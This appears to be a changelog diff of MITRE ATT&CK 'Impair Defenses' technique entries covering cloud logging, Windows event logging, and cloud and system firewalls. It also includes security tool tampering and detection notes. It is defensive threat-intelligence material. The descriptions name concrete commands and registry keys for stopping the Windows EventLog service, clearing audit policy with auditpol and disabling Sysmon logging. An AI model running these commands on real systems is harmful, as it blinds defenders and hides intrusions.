x_mitre_detectionMonitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'az monitor diagnostic-settings', 'description': 'Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.', 'url': 'https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete'}
x_mitre_contributorsJoe Gumke, U.S. Bank
x_mitre_data_sourcesUser Account: User Account Modification
x_mitre_platformsSaaS
x_mitre_platformsGoogle Workspace
x_mitre_platformsAzure AD
x_mitre_platformsOffice 365

[T1562.002] Impair Defenses: Disable Windows Event Logging

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may disable Windows event logging to limit data t1Adversaries may disable Windows event logging to limit data 
>that can be leveraged for detections and audits. Windows eve>that can be leveraged for detections and audits. Windows eve
>nt logs record user and system activity such as login attemp>nt logs record user and system activity such as login attemp
>ts, process creation, and much more.(Citation: Windows Log E>ts, process creation, and much more.(Citation: Windows Log E
>vents) This data is used by security tools and analysts to g>vents) This data is used by security tools and analysts to g
>enerate detections.  The EventLog service maintains event lo>enerate detections.  The EventLog service maintains event lo
>gs from various system components and applications.(Citation>gs from various system components and applications.(Citation
>: EventLog_Core_Technologies) By default, the service automa>: EventLog_Core_Technologies) By default, the service automa
>tically starts when a system powers on. An audit policy, mai>tically starts when a system powers on. An audit policy, mai
>ntained by the Local Security Policy (secpol.msc), defines w>ntained by the Local Security Policy (secpol.msc), defines w
>hich system events the EventLog service logs. Security audit>hich system events the EventLog service logs. Security audit
> policy settings can be changed by running secpol.msc, then > policy settings can be changed by running secpol.msc, then 
>navigating to <code>Security Settings\Local Policies\Audit P>navigating to <code>Security Settings\Local Policies\Audit P
>olicy</code> for basic audit policy settings or <code>Securi>olicy</code> for basic audit policy settings or <code>Securi
>ty Settings\Advanced Audit Policy Configuration</code> for a>ty Settings\Advanced Audit Policy Configuration</code> for a
>dvanced audit policy settings.(Citation: Audit_Policy_Micros>dvanced audit policy settings.(Citation: Audit_Policy_Micros
>oft)(Citation: Advanced_sec_audit_policy_settings) <code>aud>oft)(Citation: Advanced_sec_audit_policy_settings) <code>aud
>itpol.exe</code> may also be used to set audit policies.(Cit>itpol.exe</code> may also be used to set audit policies.(Cit
>ation: auditpol)  Adversaries may target system-wide logging>ation: auditpol)  Adversaries may target system-wide logging
> or just that of a particular application. For example, the > or just that of a particular application. For example, the 
>EventLog service may be disabled using the following PowerSh>Windows EventLog service may be disabled using the <code>Set
>ell line: <code>Stop-Service -Name EventLog</code>.(Citation>-Service -Name EventLog -Status Stopped</code> or <code>sc c
>: Disable_Win_Event_Logging) Additionally, adversaries may u>onfig eventlog start=disabled</code> commands (followed by m
>se <code>auditpol</code> and its sub-commands in a command p>anually stopping the service using <code>Stop-Service  -Name
>rompt to disable auditing or clear the audit policy. To enab> EventLog</code>).(Citation: Disable_Win_Event_Logging)(Cita
>le or disable a specified setting or audit category, adversa>tion: disable_win_evt_logging) Additionally, the service may
>ries may use the <code>/success</code> or <code>/failure</co> be disabled by modifying the “Start” value in <code>HKEY_LO
>de> parameters. For example, <code>auditpol /set /category:”>CAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog</code
>Account Logon” /success:disable /failure:disable</code> turn>then restarting the system for the change to take effect.(
>s off auditing for the Account Logon category.(Citation: aud>Citation: disable_win_evt_logging)  There are several ways t
>itpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clea>o disable the EventLog service via registry key modification
>r the audit policy, adversaries may run the following lines:>. First, without Administrator privileges, adversaries may m
> <code>auditpol /clear /y</code> or <code>auditpol /remove />odify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\
>allusers</code>.(Citation: T1562.002_redcanaryco)  By disabl>SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Sec
>ing Windows event logging, adversaries can operate while lea>urity</code>, then reboot the system to disable the Security
>ving less evidence of a compromise behind.> EventLog.(Citation: winser19_file_overwrite_bug_twitter) Se
 >cond, with Administrator privilege, adversaries may modify t
 >he same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon
 >trolSet\Control\WMI\Autologger\EventLog-System</code> and <c
 >ode>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\
 >Autologger\EventLog-Application</code> to disable the entire
 > EventLog.(Citation: disable_win_evt_logging)  Additionally,
 > adversaries may use <code>auditpol</code> and its sub-comma
 >nds in a command prompt to disable auditing or clear the aud
 >it policy. To enable or disable a specified setting or audit
 > category, adversaries may use the <code>/success</code> or 
 ><code>/failure</code> parameters. For example, <code>auditpo
 >l /set /category:”Account Logon” /success:disable /failure:d
 >isable</code> turns off auditing for the Account Logon categ
 >ory.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_re
 >dcanaryco) To clear the audit policy, adversaries may run th
 >e following lines: <code>auditpol /clear /y</code> or <code>
 >auditpol /remove /allusers</code>.(Citation: T1562.002_redca
 >naryco)  By disabling Windows event logging, adversaries can
 > operate while leaving less evidence of a compromise behind.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 13:37:30.534000+00:002023-03-17 23:24:19.730000+00:00
descriptionAdversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging) There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
external_references[1]['source_name']Windows Log EventsDisable_Win_Event_Logging
external_references[1]['description']Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020. dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.
external_references[1]['url']https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging
external_references[2]['source_name']EventLog_Core_Technologiesdef_ev_win_event_logging
external_references[2]['description']Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.
external_references[2]['url']https://www.coretechnologies.com/blog/windows-services/eventlog/https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
external_references[3]['source_name']Audit_Policy_MicrosoftEventLog_Core_Technologies
external_references[3]['description']Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.
external_references[3]['url']https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policyhttps://www.coretechnologies.com/blog/windows-services/eventlog/
external_references[4]['source_name']Advanced_sec_audit_policy_settingsAudit_Policy_Microsoft
external_references[4]['description']Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.
external_references[4]['url']https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settingshttps://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy
external_references[5]['source_name']auditpolWindows Log Events
external_references[5]['description']Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.
external_references[5]['url']https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpolhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/
external_references[6]['source_name']Disable_Win_Event_Loggingdisable_win_evt_logging
external_references[6]['description'] dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[6]['url']https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logginghttps://ptylu.github.io/content/report/report.html?report=25
external_references[7]['source_name']auditpol.exe_STRONTICauditpol
external_references[7]['description']STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.
external_references[7]['url']https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.htmlhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol
external_references[8]['source_name']T1562.002_redcanarycowinser19_file_overwrite_bug_twitter
external_references[8]['description']redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.
external_references[8]['url']https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.mdhttps://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040
external_references[9]['source_name']def_ev_win_event_loggingT1562.002_redcanaryco
external_references[9]['description']Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.
external_references[9]['url']https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
external_references[10]['source_name']evt_log_tamperingAdvanced_sec_audit_policy_settings
external_references[10]['description']svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.
external_references[10]['url']https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335chttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings
x_mitre_data_sources[0]Command: Command ExecutionSensor Health: Host Status
x_mitre_data_sources[1]Sensor Health: Host StatusScript: Script Execution
x_mitre_data_sources[3]Script: Script ExecutionWindows Registry: Windows Registry Key Creation
x_mitre_data_sources[5]Windows Registry: Windows Registry Key CreationCommand: Command Execution
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'auditpol.exe_STRONTIC', 'description': 'STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.', 'url': 'https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html'}
external_references{'source_name': 'evt_log_tampering', 'description': 'svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.', 'url': 'https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c'}
x_mitre_contributorsLucas Heiligenstein

[T1562.007] Impair Defenses: Disable or Modify Cloud Firewall

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may disable or modify a firewall within a cloud t1Adversaries may disable or modify a firewall within a cloud 
>environment to bypass controls that limit access to cloud re>environment to bypass controls that limit access to cloud re
>sources. Cloud firewalls are separate from system firewalls >sources. Cloud firewalls are separate from system firewalls 
>that are described in [Disable or Modify System Firewall](ht>that are described in [Disable or Modify System Firewall](ht
>tps://attack.mitre.org/techniques/T1562/004).   Cloud enviro>tps://attack.mitre.org/techniques/T1562/004).   Cloud enviro
>nments typically utilize restrictive security groups and fir>nments typically utilize restrictive security groups and fir
>ewall rules that only allow network activity from trusted IP>ewall rules that only allow network activity from trusted IP
> addresses via expected ports and protocols. An adversary ma> addresses via expected ports and protocols. An adversary ma
>y introduce new firewall rules or policies to allow access i>y introduce new firewall rules or policies to allow access i
>nto a victim cloud environment. For example, an adversary ma>nto a victim cloud environment. For example, an adversary ma
>y use a script or utility that creates new ingress rules in >y use a script or utility that creates new ingress rules in 
>existing security groups to allow any TCP/IP connectivity.(C>existing security groups to allow any TCP/IP connectivity, o
>itation: Expel IO Evil in AWS)  Modifying or disabling a clo>r remove networking limitations to support traffic associate
>ud firewall may enable adversary C2 communications, lateral >d with malicious activity (such as cryptomining).(Citation: 
>movement, and/or data exfiltration that would otherwise not >Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromise
>be allowed.>d Cloud Compute Credentials 2022)  Modifying or disabling a 
 >cloud firewall may enable adversary C2 communications, later
 >al movement, and/or data exfiltration that would otherwise n
 >ot be allowed.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:02.146000+00:002023-04-15 00:25:36.502000+00:00
descriptionAdversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS) Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022', 'description': 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.', 'url': 'https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/'}

[T1562.004] Impair Defenses: Disable or Modify System Firewall

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may disable or modify system firewalls in order t1Adversaries may disable or modify system firewalls in order 
>to bypass controls limiting network usage. Changes could be >to bypass controls limiting network usage. Changes could be 
>disabling the entire mechanism as well as adding, deleting, >disabling the entire mechanism as well as adding, deleting, 
>or modifying particular rules. This can be done numerous way>or modifying particular rules. This can be done numerous way
>s depending on the operating system, including via command-l>s depending on the operating system, including via command-l
>ine, editing Windows Registry keys, and Windows Control Pane>ine, editing Windows Registry keys, and Windows Control Pane
>l.  Modifying or disabling a system firewall may enable adve>l.  Modifying or disabling a system firewall may enable adve
>rsary C2 communications, lateral movement, and/or data exfil>rsary C2 communications, lateral movement, and/or data exfil
>tration that would otherwise not be allowed. >tration that would otherwise not be allowed. For example, ad
 >versaries may add a new firewall rule for a well-known proto
 >col (such as RDP) using a non-traditional and potentially le
 >ss securitized port (i.e. [Non-Standard Port](https://attack
 >.mitre.org/techniques/T1571)).(Citation: change_rdp_port_con
 >ti)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 22:18:11.166000+00:002023-02-28 22:34:38.316000+00:00
descriptionAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
x_mitre_data_sources[1]Firewall: Firewall Rule ModificationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[3]Windows Registry: Windows Registry Key ModificationFirewall: Firewall Rule Modification
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'change_rdp_port_conti', 'description': 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved March 1, 2022.', 'url': 'https://twitter.com/TheDFIRReport/status/1498657772254240768'}

[T1562.001] Impair Defenses: Disable or Modify Tools

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may modify and/or disable security tools to avoit1Adversaries may modify and/or disable security tools to avoi
>d possible detection of their malware/tools and activities. >d possible detection of their malware/tools and activities. 
>This may take many forms, such as killing security software >This may take many forms, such as killing security software 
>processes or services, modifying / deleting Registry keys or>processes or services, modifying / deleting Registry keys or
> configuration files so that tools do not operate properly, > configuration files so that tools do not operate properly, 
>or other methods to interfere with security tools scanning o>or other methods to interfere with security tools scanning o
>r reporting information. Adversaries may also disable update>r reporting information. Adversaries may also disable update
>s to prevent the latest security patches from reaching tools>s to prevent the latest security patches from reaching tools
> on victim systems.(Citation: SCADAfence_ransomware)  Advers> on victim systems.(Citation: SCADAfence_ransomware)  Advers
>aries may also tamper with artifacts deployed and utilized b>aries may also tamper with artifacts deployed and utilized b
>y security tools. Security tools may make dynamic changes to>y security tools. Security tools may make dynamic changes to
> system components in order to maintain visibility into spec> system components in order to maintain visibility into spec
>ific events. For example, security products may load their o>ific events. For example, security products may load their o
>wn modules and/or modify those loaded by processes to facili>wn modules and/or modify those loaded by processes to facili
>tate data collection. Similar to [Indicator Blocking](https:>tate data collection. Similar to [Indicator Blocking](https:
>//attack.mitre.org/techniques/T1562/006), adversaries may un>//attack.mitre.org/techniques/T1562/006), adversaries may un
>hook or otherwise modify these features added by tools (espe>hook or otherwise modify these features added by tools (espe
>cially those that exist in userland or are otherwise potenti>cially those that exist in userland or are otherwise potenti
>ally accessible to adversaries) to avoid detection.(Citation>ally accessible to adversaries) to avoid detection.(Citation
>: OutFlank System Calls)(Citation: MDSec System Calls)  In c>: OutFlank System Calls)(Citation: MDSec System Calls)   Adv
>loud environments, tools disabled by adversaries may include>ersaries may also focus on specific applications such as Sys
> cloud monitoring agents that report back to services such a>mon. For example, the “Start” and “Enable” values in <code>H
>s AWS CloudWatch or Google Cloud Monitor.  Furthermore, alth>KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autol
>ough defensive tools may have anti-tampering mechanisms, adv>ogger\EventLog-Microsoft-Windows-Sysmon-Operational</code> m
>ersaries may abuse tools such as legitimate rootkit removal >ay be modified to tamper with and potentially disable Sysmon
>kits to impair and/or disable these tools.(Citation: chasing> logging.(Citation: disable_win_evt_logging)   In cloud envi
>_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: >ronments, tools disabled by adversaries may include cloud mo
>demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For e>nitoring agents that report back to services such as AWS Clo
>xample, adversaries have used tools such as GMER to find and>udWatch or Google Cloud Monitor.  Furthermore, although defe
> shut down hidden processes and antivirus software on infect>nsive tools may have anti-tampering mechanisms, adversaries 
>ed systems.(Citation: demystifying_ryuk)  Additionally, adve>may abuse tools such as legitimate rootkit removal kits to i
>rsaries may exploit legitimate drivers from anti-virus softw>mpair and/or disable these tools.(Citation: chasing_avaddon_
>are to gain access to kernel space (i.e. [Exploitation for P>ransomware)(Citation: dharma_ransomware)(Citation: demystify
>rivilege Escalation](https://attack.mitre.org/techniques/T10>ing_ryuk)(Citation: doppelpaymer_crowdstrike) For example, a
>68)), which may lead to bypassing anti-tampering features.(C>dversaries have used tools such as GMER to find and shut dow
>itation: avoslocker_ransomware)>n hidden processes and antivirus software on infected system
 >s.(Citation: demystifying_ryuk)  Additionally, adversaries m
 >ay exploit legitimate drivers from anti-virus software to ga
 >in access to kernel space (i.e. [Exploitation for Privilege 
 >Escalation](https://attack.mitre.org/techniques/T1068)), whi
 >ch may lead to bypassing anti-tampering features.(Citation: 
 >avoslocker_ransomware)
Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referencesTran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-578
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:23:59.433000+00:002023-04-12 13:43:42.986000+00:00
descriptionAdversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware) Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware) Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
external_references[2]['source_name']chasing_avaddon_ransomwaredisable_win_evt_logging
external_references[2]['description']Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[2]['url']https://www.mandiant.com/resources/chasing-avaddon-ransomwarehttps://ptylu.github.io/content/report/report.html?report=25
external_references[3]['source_name']doppelpaymer_crowdstrikechasing_avaddon_ransomware
external_references[3]['description']Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.
external_references[3]['url']https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/https://www.mandiant.com/resources/chasing-avaddon-ransomware
external_references[4]['source_name']avoslocker_ransomwaredoppelpaymer_crowdstrike
